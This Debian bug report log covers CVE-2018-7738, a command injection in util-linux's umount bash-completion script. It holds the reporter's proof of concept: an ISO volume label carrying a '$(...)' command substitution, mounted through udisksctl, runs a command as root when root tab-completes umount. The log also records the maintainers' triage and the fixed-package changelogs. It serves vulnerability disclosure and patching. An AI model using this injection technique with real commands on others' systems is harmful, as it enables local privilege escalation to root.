Debian Bug report logs -
#892179
util-linux: CVE-2018-7738: code execution in bash-completion for umount
Reported by: Björn Bosselmann <Bjoern.Bosselmann@gdata.de>
Date: Tue, 6 Mar 2018 13:54:01 UTC
Severity: grave
Tags: fixed-upstream, security, upstream
Found in version util-linux/2.29.2-1
Fixed in versions util-linux/2.31.1-0.5, util-linux/2.29.2-1+deb9u1
Done: Salvatore Bonaccorso <carnil@debian.org>
Bug is archived. No further changes may be made.
Toggle useless messages
Report forwarded
to debian-bugs-dist@lists.debian.org, Gabriel F. T. Gomes <gabriel@inconstante.eti.br>:
Bug#892179; Package bash-completion.
(Tue, 06 Mar 2018 13:54:04 GMT) (full text, mbox, link).
Acknowledgement sent
to Björn Bosselmann <Bjoern.Bosselmann@gdata.de>:
New Bug report received and forwarded. Copy sent to Gabriel F. T. Gomes <gabriel@inconstante.eti.br>.
(Tue, 06 Mar 2018 13:54:04 GMT) (full text, mbox, link).
Message #5 received at submit@bugs.debian.org (full text, mbox, reply):
[Message part 1 (text/plain, inline)]
Package: bash-completion
Version: 1:2.1-4.3
Severity: grave
Tags: security
Hi,
when bash-completion is installed, it uses
/usr/share/bash-completion/completions/umount from umount package to
provide autocompletion. This script does not escape mount paths
correctly, so it allows a local user with rights to mount filesystems to
execute commands in the context of the umount user (probably root).
Unprivileged users can mount filesystems with custom mountpoints using
udisks2, FUSE or with the help of desktop environments.
Example:
as regular user:
------------------------------
$ mkdir empty
$ genisoimage -o test.iso -V '$(IFS=":";cmd="touch:foo";$cmd)' empty
I: -input-charset not specified, using utf-8 (detected in locale settings)
Total translation table size: 0
Total rockridge attributes bytes: 0
Total directory bytes: 0
Path table size(bytes): 10
Max brk space used 0
174 extents written (0 MB)
$ udisksctl loop-setup -f test.iso
Mapped file test.iso as /dev/loop0.
(if not mounted by automounter already)
$ udisksctl mount -b /dev/loop0
Mounted /dev/loop0 at /media/user/$(IFS=":";cmd="touch:foo";$cmd).
------------------------------
as different user or even root:
------------------------------
# ls -la
total 28
drwxr-xr-x 2 root root 4096 Feb 14 10:00 .
drwxrwxrwt 29 root root 24576 Feb 14 10:00 ..
# umount <TAB> ^C
# ls -la
total 28
drwxr-xr-x 2 root root 4096 Feb 14 10:01 .
drwxrwxrwt 29 root root 24576 Feb 14 10:00 ..
-rw-r--r-- 1 root root 0 Feb 14 10:01 foo
------------------------------
I tested it using latest Debian GNU/Linux 9.3 (stretch) using default
installation with desktop environment.
Involved packages:
mount 2.29.2-1
bash 4.4-5
bash-completion 1:2.1-4.3
genisoimage 9:1.1.11-3+b2
udisks2 2.1.8-1
uname -a
Linux id382 4.9.0-6-amd64 #1 SMP Debian 4.9.82-1+deb9u3 (2018-03-02)
x86_64 GNU/Linux
It seems to be fixed in upstream util-linux already because of a similar
bugfix:
https://github.com/karelzak/util-linux/commit/75f03badd7ed9f1dd951863d75e756883d3acc55#diff-a47601b5dbce9dc06c3af1deb02758c7
Björn Bosselmann
G DATA Software AG
-- System Information:
Debian Release: 9.3
APT prefers stable-updates
APT policy: (500, 'stable-updates'), (500, 'stable')
Architecture: amd64 (x86_64)
Foreign Architectures: i386
Kernel: Linux 4.9.0-6-amd64 (SMP w/8 CPU cores)
Locale: LANG=de_DE.UTF-8, LC_CTYPE=de_DE.UTF-8 (charmap=UTF-8),
LANGUAGE= (charmap=UTF-8)
Shell: /bin/sh linked to /bin/dash
Init: systemd (via /run/systemd/system)
Versions of packages bash-completion depends on:
ii bash 4.4-5
ii dpkg 1.18.24
bash-completion recommends no packages.
bash-completion suggests no packages.
-- no debconf information
[signature.asc (application/pgp-signature, attachment)]
Information forwarded
to debian-bugs-dist@lists.debian.org, Gabriel F. T. Gomes <gabriel@inconstante.eti.br>:
Bug#892179; Package bash-completion.
(Tue, 06 Mar 2018 20:06:02 GMT) (full text, mbox, link).
Acknowledgement sent
to Salvatore Bonaccorso <carnil@debian.org>:
Extra info received and forwarded to list. Copy sent to Gabriel F. T. Gomes <gabriel@inconstante.eti.br>.
(Tue, 06 Mar 2018 20:06:02 GMT) (full text, mbox, link).
Message #10 received at 892179@bugs.debian.org (full text, mbox, reply):
Control: reassign -1 src:util-linux 2.29.2-1
Control: tags -1 + upstream fixed-upstream
Hi Björn
Thanks for reporting the issue!
On Tue, Mar 06, 2018 at 02:44:39PM +0100, Björn Bosselmann wrote:
> Package: bash-completion
> Version: 1:2.1-4.3
> Severity: grave
> Tags: security
>
> Hi,
>
> when bash-completion is installed, it uses
> /usr/share/bash-completion/completions/umount from umount package to
> provide autocompletion. This script does not escape mount paths
> correctly, so it allows a local user with rights to mount filesystems to
> execute commands in the context of the umount user (probably root).
> Unprivileged users can mount filesystems with custom mountpoints using
> udisks2, FUSE or with the help of desktop environments.
The umount completion is actually provided by util-linux (since 2.28-1
where it took over from bash-completion itself). I'm thus reassigning
it to src:util-linux. Then if the issue is present as well in
bash-completion earlier than 1:2.1-4.3, then 1:2.1-4.3 removed the
completion and would not be affected in the resulting binary packages
(source still might be).
Regards,
Salvatore
No longer marked as found in versions bash-completion/1:2.1-4.3.
Request was from Salvatore Bonaccorso <carnil@debian.org>
to 892179-submit@bugs.debian.org.
(Tue, 06 Mar 2018 20:06:03 GMT) (full text, mbox, link).
Marked as found in versions util-linux/2.29.2-1.
Request was from Salvatore Bonaccorso <carnil@debian.org>
to 892179-submit@bugs.debian.org.
(Tue, 06 Mar 2018 20:06:04 GMT) (full text, mbox, link).
Added tag(s) upstream and fixed-upstream.
Request was from Salvatore Bonaccorso <carnil@debian.org>
to 892179-submit@bugs.debian.org.
(Tue, 06 Mar 2018 20:06:04 GMT) (full text, mbox, link).
Changed Bug title to 'util-linux: CVE-2018-7738: code execution in bash-completion for umount' from 'code execution in bash-completion for umount'.
Request was from Salvatore Bonaccorso <carnil@debian.org>
to control@bugs.debian.org.
(Tue, 06 Mar 2018 21:33:09 GMT) (full text, mbox, link).
Reply sent
to Salvatore Bonaccorso <carnil@debian.org>:
You have taken responsibility.
(Wed, 07 Mar 2018 16:39:26 GMT) (full text, mbox, link).
Notification sent
to Björn Bosselmann <Bjoern.Bosselmann@gdata.de>:
Bug acknowledged by developer.
(Wed, 07 Mar 2018 16:39:26 GMT) (full text, mbox, link).
Message #25 received at 892179-close@bugs.debian.org (full text, mbox, reply):
Source: util-linux
Source-Version: 2.31.1-0.5
We believe that the bug you reported is fixed in the latest version of
util-linux, which is due to be installed in the Debian FTP archive.
A summary of the changes between this version and the previous one is
attached.
Thank you for reporting the bug, which will now be closed. If you
have further comments please address them to 892179@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.
Debian distribution maintenance software
pp.
Salvatore Bonaccorso <carnil@debian.org> (supplier of updated util-linux package)
(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmaster@ftp-master.debian.org)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512
Format: 1.8
Date: Tue, 06 Mar 2018 22:31:39 +0100
Source: util-linux
Binary: util-linux util-linux-locales mount bsdutils fdisk fdisk-udeb libblkid1 libblkid1-udeb libblkid-dev libfdisk1 libfdisk1-udeb libfdisk-dev libmount1 libmount1-udeb libmount-dev libsmartcols1 libsmartcols1-udeb libsmartcols-dev libuuid1 uuid-runtime libuuid1-udeb uuid-dev util-linux-udeb setpriv rfkill
Architecture: source
Version: 2.31.1-0.5
Distribution: unstable
Urgency: medium
Maintainer: LaMont Jones <lamont@debian.org>
Changed-By: Salvatore Bonaccorso <carnil@debian.org>
Closes: 745771 892179
Description:
bsdutils - basic utilities from 4.4BSD-Lite
fdisk - collection of partitioning utilities
fdisk-udeb - Manually partition a hard drive (fdisk) (udeb)
libblkid-dev - block device ID library - headers and static libraries
libblkid1 - block device ID library
libblkid1-udeb - stripped down block device ID library, for debian-installer (udeb)
libfdisk-dev - fdisk partitioning library - headers and static libraries
libfdisk1 - fdisk partitioning library
libfdisk1-udeb - stripped down fdisk partitioning library, for debian-installer (udeb)
libmount-dev - device mounting library - headers and static libraries
libmount1 - device mounting library
libmount1-udeb - stripped down device mounting library, for debian-installer (udeb)
libsmartcols-dev - smart column output alignment library - headers and static librar
libsmartcols1 - smart column output alignment library
libsmartcols1-udeb - stripped down smart column output aligment library, for debian-in (udeb)
libuuid1 - Universally Unique ID library
libuuid1-udeb - stripped down Universally Unique ID library, for debian-installer (udeb)
mount - tools for mounting and manipulating filesystems
rfkill - tool for enabling and disabling wireless devices
setpriv - tool to run a program with different Linux privilege settings
util-linux - miscellaneous system utilities
util-linux-locales - locales files for util-linux
util-linux-udeb - stripped down miscellaneous system utilities, for debian-installe (udeb)
uuid-dev - Universally Unique ID library - headers and static libraries
uuid-runtime - runtime components for the Universally Unique ID library
Changes:
util-linux (2.31.1-0.5) unstable; urgency=medium
.
* Non-maintainer upload.
.
[ Laurent Bigonville ]
* debian/rules: Enable SMACK support for libmount
* Enable audit support (Closes: #745771)
.
[ Salvatore Bonaccorso ]
* bash-completion: (umount) use findmnt, escape a space in paths.
(CVE-2018-7738)
Fixes "code execution in bash-completion for umount". (Closes: #892179)
Checksums-Sha1:
725360ea1dd6cafab53cd6cb47b820b6fe246db9 4181 util-linux_2.31.1-0.5.dsc
af698313de08817f24fbf6b899105946a429da76 87512 util-linux_2.31.1-0.5.debian.tar.xz
Checksums-Sha256:
d67c1bc851f0dd5028387671940b5904fabad2cb24e98eeb4a755fce7e82d317 4181 util-linux_2.31.1-0.5.dsc
a0b049065431f8c9455fbe7276b8ca7cdf020cff0329cd1f050ee1fb380432ee 87512 util-linux_2.31.1-0.5.debian.tar.xz
Files:
4f132982232dd39c252f03175e19a6c3 4181 base required util-linux_2.31.1-0.5.dsc
9a16b5741bd41c3938586e1c123fab04 87512 base required util-linux_2.31.1-0.5.debian.tar.xz
-----BEGIN PGP SIGNATURE-----
iQKmBAEBCgCQFiEERkRAmAjBceBVMd3uBUy48xNDz0QFAlqfiN5fFIAAAAAALgAo
aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2
NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQSHGNhcm5pbEBk
ZWJpYW4ub3JnAAoJEAVMuPMTQ89EQaEP/2hMnxx0hkQ9rhGQXmAt0LXsdnLLka0o
93JKtW0TmCKDh9Bfm+SP1W/BWu7jYDDpm/O1cAv7+H/4hCraG3q0ZXyjoUP6u7gR
7bXUnEeDEVectjfQMyIhcaY50UoMog8dyH8O1EOt9gPRmbbxYrkXQK6iJPZslCt+
gV06FZQ5yuCWL2oCfL7udisRO7VdbUrv61VkY0t9pYsSTfjZAT1FA3YCCbQ7m4me
jOpEDPHFt7SbXGTPVfbr6izvm+XmPBtZtWo1NjsOwNRfqCxN4PBjP2YFmIcmXyJE
OR+jUvZz8VWvonbomTr/jNcgbKh4oLKojsLMzJOkFuO+u4YiR1qGzV7TBOkl77EM
+0xGKKOcms5kZDU/YHXK7ObZslCfvVWlKHcbASCsj+IihNyrqDiExL89uQ/X99jj
oi9nhGe5Jdfdw1l7x7kgISzpWhBEZ4eYxAMPsPrEzAInZF12abaJ2trRs285QlS6
zrot5wD5UKjBmggijj5IWSgJgDFiP6pJL4MnCleNxwOCWbBbgvwr+Cho86aH45AQ
ufNhlBpqp0xgfU46YVOcVk5Z3UTbY0Vtli9z+aeOnWGWBDJeYTdvcyO6pj5XQwD3
DlCRH24UZsLmpDavBcNKjXf4um6xbl0nxDgAMfXwhor9cpi1YqVzAEInGcnpK30o
dOlWnSG1eTBB
=qoQ3
-----END PGP SIGNATURE-----
Reply sent
to Salvatore Bonaccorso <carnil@debian.org>:
You have taken responsibility.
(Sun, 11 Mar 2018 21:04:13 GMT) (full text, mbox, link).
Notification sent
to Björn Bosselmann <Bjoern.Bosselmann@gdata.de>:
Bug acknowledged by developer.
(Sun, 11 Mar 2018 21:04:13 GMT) (full text, mbox, link).
Message #30 received at 892179-close@bugs.debian.org (full text, mbox, reply):
Source: util-linux
Source-Version: 2.29.2-1+deb9u1
We believe that the bug you reported is fixed in the latest version of
util-linux, which is due to be installed in the Debian FTP archive.
A summary of the changes between this version and the previous one is
attached.
Thank you for reporting the bug, which will now be closed. If you
have further comments please address them to 892179@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.
Debian distribution maintenance software
pp.
Salvatore Bonaccorso <carnil@debian.org> (supplier of updated util-linux package)
(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmaster@ftp-master.debian.org)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512
Format: 1.8
Date: Wed, 07 Mar 2018 19:29:09 +0100
Source: util-linux
Binary: util-linux util-linux-locales mount bsdutils fdisk-udeb libblkid1 libblkid1-udeb libblkid-dev libfdisk1 libfdisk1-udeb libfdisk-dev libmount1 libmount1-udeb libmount-dev libsmartcols1 libsmartcols1-udeb libsmartcols-dev libuuid1 uuid-runtime libuuid1-udeb uuid-dev util-linux-udeb setpriv
Architecture: source
Version: 2.29.2-1+deb9u1
Distribution: stretch-security
Urgency: high
Maintainer: Debian util-linux Maintainers <ah-util-linux@debian.org>
Changed-By: Salvatore Bonaccorso <carnil@debian.org>
Closes: 892179
Description:
bsdutils - basic utilities from 4.4BSD-Lite
fdisk-udeb - Manually partition a hard drive (fdisk) (udeb)
libblkid-dev - block device ID library - headers and static libraries
libblkid1 - block device ID library
libblkid1-udeb - stripped down block device ID library, for debian-installer (udeb)
libfdisk-dev - fdisk partitioning library - headers and static libraries
libfdisk1 - fdisk partitioning library
libfdisk1-udeb - stripped down fdisk partitioning library, for debian-installer (udeb)
libmount-dev - device mounting library - headers and static libraries
libmount1 - device mounting library
libmount1-udeb - stripped down device mounting library, for debian-installer (udeb)
libsmartcols-dev - smart column output alignment library - headers and static librar
libsmartcols1 - smart column output alignment library
libsmartcols1-udeb - stripped down smart column output aligment library, for debian-in (udeb)
libuuid1 - Universally Unique ID library
libuuid1-udeb - stripped down Universally Unique ID library, for debian-installer (udeb)
mount - tools for mounting and manipulating filesystems
setpriv - tool to run a program with different Linux privilege settings
util-linux - miscellaneous system utilities
util-linux-locales - locales files for util-linux
util-linux-udeb - stripped down miscellaneous system utilities, for debian-installe (udeb)
uuid-dev - Universally Unique ID library - headers and static libraries
uuid-runtime - runtime components for the Universally Unique ID library
Changes:
util-linux (2.29.2-1+deb9u1) stretch-security; urgency=high
.
* Non-maintainer upload by the Security Team.
* bash-completion: (umount) use findmnt, escape a space in paths
(CVE-2018-7738) (Closes: #892179)
Checksums-Sha1:
5575478b2b095f0df2f6c30aa21fef1dbecb9acc 4101 util-linux_2.29.2-1+deb9u1.dsc
b488f185e74187a63b55baef9d3f48d5b1780118 4277668 util-linux_2.29.2.orig.tar.xz
3d73e73f2402bf7b2b61c1e4e7c451d59e32db11 74280 util-linux_2.29.2-1+deb9u1.debian.tar.xz
Checksums-Sha256:
f84985e3b01d7758bf835484a5861d687ffee07778dadab5adc10a7e312da950 4101 util-linux_2.29.2-1+deb9u1.dsc
accea4d678209f97f634f40a93b7e9fcad5915d1f4749f6c47bee6bf110fe8e3 4277668 util-linux_2.29.2.orig.tar.xz
33867c063f828a1937c1dd4797b3cd977a2e7da31eb1227c396f7dbf06dde3a6 74280 util-linux_2.29.2-1+deb9u1.debian.tar.xz
Files:
5041092813b91904152dd2bbe25504f8 4101 base required util-linux_2.29.2-1+deb9u1.dsc
63c40c2068fcbb7e1d5c1d281115d973 4277668 base required util-linux_2.29.2.orig.tar.xz
7532de196c10edf323d41a8cdd745a8f 74280 base required util-linux_2.29.2-1+deb9u1.debian.tar.xz
-----BEGIN PGP SIGNATURE-----
iQKmBAEBCgCQFiEERkRAmAjBceBVMd3uBUy48xNDz0QFAlqgMNZfFIAAAAAALgAo
aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2
NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQSHGNhcm5pbEBk
ZWJpYW4ub3JnAAoJEAVMuPMTQ89E4ykP/Aofd0Y71fCrIL/eFpvqoOGb/EhPhntd
LhJSRnv27f+OfOTQuHp9USZij5W2Mvs9DkGMWYVJbkUmDJcxxPcFZ0D85Ivb+iHp
+bIvfw4jxSPfjVwObew62ZjF1QG+YBCwLrFHrYAJpKmoW3+34CiuDauva38+mtCl
FPBfitqZ5MIIe3RHCd62IOa6UfOxeb+8ZbY0XZyKk7iB0t9ze6JitdqhOH3UjH1o
z58+zM7wbQUT4qVMvDmDDdnDYfJmPGzeLlxujscjZYXDCW+TQRoMF+RG8uIbyVqZ
pV+cwuWa+G4pCR8Pqqn2nyekxzYUUfg5iYf3amNgJFRX6XHVniTOMYwOqBKBRwLA
qFtk8BEGVwrIPbTcjvtl7bjqJRJW/YIOL3+EwdcCiizyTOiMLI0UsP2YzWmKoopv
cLOBChb6FHtqq7PJCqq1gOwUg/RcDYfkjOCpXoSX3XkKMNNHExSvePcyaEhyqQdA
+WG541Bw102xJc06LbRVBMxjcf/bUC7iBVXOvZ66KTcckRSccv1U/dn4rZuOTOG7
4EYXDuZbH0ER1J62wLXgOIeHVxe9urfd1AYHU/7b08VxdTbN0sDA7Kn9iCXY+qfJ
rYBh4jsTfwLHWHHCV4ttjuWiBMRFXgiWMMb660UMMgcghyWlb6pIlUgboXPlyETW
0Kn0GQnxQGZW
=61qI
-----END PGP SIGNATURE-----
Bug archived.
Request was from Debbugs Internal Request <owner@bugs.debian.org>
to internal_control@bugs.debian.org.
(Sun, 29 Jul 2018 07:30:07 GMT) (full text, mbox, link).
Send a report that this bug log contains spam.
Debian bug tracking system administrator <owner@bugs.debian.org>.
Last modified:
Wed Jun 19 13:58:13 2019;
Machine Name:
buxtehude
Debian Bug tracking system
Debbugs is free software and licensed under the terms of the GNU
Public License version 2. The current version can be obtained
from https://bugs.debian.org/debbugs-source/.
Copyright © 1999 Darren O. Benham,
1997,2003 nCipher Corporation Ltd,
1994-97 Ian Jackson,
2005-2017 Don Armstrong, and many other contributors.
Vulmon